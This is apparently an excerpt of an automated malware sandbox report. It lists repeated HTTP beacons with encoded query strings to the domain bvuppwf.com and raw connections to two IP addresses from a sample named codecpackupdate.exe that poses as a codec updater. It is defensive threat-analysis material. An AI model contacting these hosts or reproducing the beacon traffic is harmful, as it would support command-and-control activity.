        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: unknownTCP traffic detected without corresponding DNS query: 88.80.148.19
        Source: unknownTCP traffic detected without corresponding DNS query: 88.80.148.19
        Source: unknownTCP traffic detected without corresponding DNS query: 88.80.148.19
        Source: unknownTCP traffic detected without corresponding DNS query: 88.80.148.19
        Source: unknownTCP traffic detected without corresponding DNS query: 88.80.148.19
        Source: unknownTCP traffic detected without corresponding DNS query: 88.80.148.19
        Source: unknownTCP traffic detected without corresponding DNS query: 88.80.148.19
        Source: unknownTCP traffic detected without corresponding DNS query: 88.80.148.19
        Source: unknownTCP traffic detected without corresponding DNS query: 88.80.148.19
        Source: unknownTCP traffic detected without corresponding DNS query: 88.80.148.19
        Source: unknownTCP traffic detected without corresponding DNS query: 88.80.148.19
        Source: unknownTCP traffic detected without corresponding DNS query: 88.80.148.19
        Source: unknownTCP traffic detected without corresponding DNS query: 88.80.148.19
        Source: unknownTCP traffic detected without corresponding DNS query: 88.80.148.19
        Source: unknownTCP traffic detected without corresponding DNS query: 88.80.148.19
        Source: unknownUDP traffic detected without corresponding DNS query: 91.211.247.248
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeCode function: 3_2_009F72A7 Sleep,RtlEnterCriticalSection,RtlLeaveCriticalSection,InternetOpenA,InternetSetOptionA,InternetSetOptionA,InternetSetOptionA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,_strtok,_swscanf,_strtok,_free,Sleep,RtlEnterCriticalSection,RtlLeaveCriticalSection,_sprintf,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,_free,3_2_009F72A7
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c645db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ffe16c1ec909e3b HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
